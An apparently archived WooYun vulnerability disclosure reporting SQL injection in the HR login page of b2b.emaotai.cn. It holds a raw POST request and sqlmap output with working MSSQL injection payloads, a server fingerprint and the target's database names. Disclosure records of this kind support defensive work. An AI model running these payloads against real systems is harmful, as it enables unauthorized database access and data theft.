乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-23: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-06: 细节向公众公开
POST /HR/LoginTo.aspx HTTP/1.1Content-Length: 2457Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://b2b.emaotai.cnCookie: ASPSESSIONIDQABDBADB=DDPFILOAGCODICDDJOLDAMCE; ASPSESSIONIDACBAADDD=FCKKMFFAFNLEIHAODLCIPDKE; ASP.NET_SessionId=a2v0pzu23atfpuazuhiry54kHost: b2b.emaotai.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*btnlogin=&cbxOrgs=e&cbxOrgs%24DDD%24L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42%2c1_74%2c2_22%2c2_29%2c2_21%2c1_67%2c1_64%2c2_24%2c1_41%2c2_15&tbxPassword=g00dPa%24%24w0rD&UsersPanel%24cbxUsers=e&UsersPanel%24cbxUsers%24DDD%24L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=1* -- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM%2bskZ93r%2bLE0i79YMR0%2b6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm%2bi1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho%2bahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs%2bWKqOe6quW%2bi%2bebkeWvn%2bWupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L%2bd566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD%2beUn%2ba0u%2bacjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu%2bmAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L%2bh5oGv5Lit5b%2bDHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y%2bR5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW%2bkOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee%2bih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw%3d%3d&__VIEWSTATEGENERATOR=CAB2EC08
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=1 AND 4618=4618 -- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=1 AND 1515=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1515=1515) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(122)+CHAR(113))) -- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6613=6613) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(122)+CHAR(113)) -- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=1;WAITFOR DELAY '0:0:5'-- -- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=-1' OR 1=1 WAITFOR DELAY '0:0:5' -- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008available databases [16]:[*] DrpECO[*] EA[*] gy[*] HR[*] HRTest[*] master[*] model[*] moutai[*] moutaiBak[*] moutaiDev[*] moutaiTest[*] msdb[*] QRTest[*] rsda[*] tempdb[*] test
危害等级:中
漏洞Rank:8
确认时间:2015-12-24 10:34
感谢您的反馈,我们将尽快修复该漏洞。
暂无
